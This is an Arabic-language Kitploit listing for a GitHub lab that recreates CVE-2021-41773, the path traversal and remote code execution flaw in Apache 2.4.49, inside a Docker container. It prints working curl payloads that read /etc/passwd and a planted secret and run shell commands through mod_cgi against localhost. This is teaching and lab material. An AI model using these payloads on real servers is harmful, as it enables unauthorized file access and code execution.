Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2021-41773-exploration — إعادة إنشاء وتحليل خطأ منطقي غريب في Apache 2.4.49 تصاعد إلى تنفيذ تعليمات برمجية عن بُعد | Kitploit
أدوات/GitHubGitHub/klmntbelgium/cve-2021-41773-exploration
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubklmntbelgium/cve-2021-41773-exploration

cve-2021-41773-exploration

إعادة إنشاء وتحليل خطأ منطقي غريب في Apache 2.4.49 تصاعد إلى تنفيذ تعليمات برمجية عن بُعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 3 أشهرلم تتم المراجعة بعد

نظرة عامة

CVE-2021-41773 هي ثغرة اجتياز مسار (Path Traversal) اكتُشفت في Apache HTTP Server 2.4.49 في أكتوبر 2021. كان السبب الجذري هو الفشل في تطبيع تسلسلات النقاط بشكل صحيح داخل عنوان URL قبل التحقق مما إذا كان المسار المطلوب يظل داخل جذر الويب. سمحت هذه الثغرة للمهاجم بالخروج من جذر الويب للوصول إلى ملفات في أي مكان على نظام ملفات الخادم، مع بعض الحالات التي ترقّت إلى تنفيذ تعليمات برمجية عن بُعد.

متجهان هجوميان موضحان في هذا الاستكشاف

  • اجتياز المسار: قراءة ملفات عشوائية في نظام الملفات
  • اجتياز المسار + تنفيذ التعليمات البرمجية عن بُعد: تنفيذ أوامر نظام تشغيل عشوائية

المتطلبات الأساسية

Docker
curl
Linux أو macOS

محتويات المستودع

Dockerfile - بناء حاوية Apache 2.4.49 هشّة
exploit.sh - سكربت سلسلة الاستغلال الآلي
README.md

نظرة عامة على Dockerfile:

  • الوصول إلى الدليل الجذر (يتيح الاجتياز)
  • تفعيل mod_cgi (يحوّل الاجتياز البسيط إلى تنفيذ تعليمات برمجية عن بُعد)
  • وضع ملف علم في /etc/secret_credential.txt لإظهار الوصول غير المصرح به إلى البيانات

تشغيل الاستغلال

ملاحظة: تأكد من تثبيت Docker وتشغيله

الخيار 1: السكربت التلقائي
chmod +x exploit.sh
./exploit.sh

الخيار 2: التنفيذ اليدوي
بناء الصورة وتشغيل الحاوية:
sudo docker build -t cve-2021-41773-env .
sudo docker run -d -p 8080:80 --name vulnerable-apache cve-2021-41773-env

أوامر curl فردية للتجربة اليدوية:
المرحلة 1 — قراءة السر الموضوع (اجتياز خالص، بدون CGI)
curl -s --path-as-is \ "http://localhost:8080/static/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/secret_credential.txt"

المرحلة 2 — قراءة /etc/passwd (اجتياز خالص، بدون CGI)
curl -s --path-as-is \ "http://localhost:8080/static/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

المرحلة 3 — RCE: تنفيذ الأوامر (يتطلب mod_cgi)
curl -s --path-as-is \ -d "echo Content-Type: text/plain; echo; id; whoami; uname -a" \ "http://localhost:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"

المرحلة 4 — السلسلة الكاملة: قراءة السر عبر RCE
curl -s --path-as-is \ -d "echo Content-Type: text/plain; echo; cat /etc/secret_credential.txt" \ "http://localhost:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"

تنزيل الأداة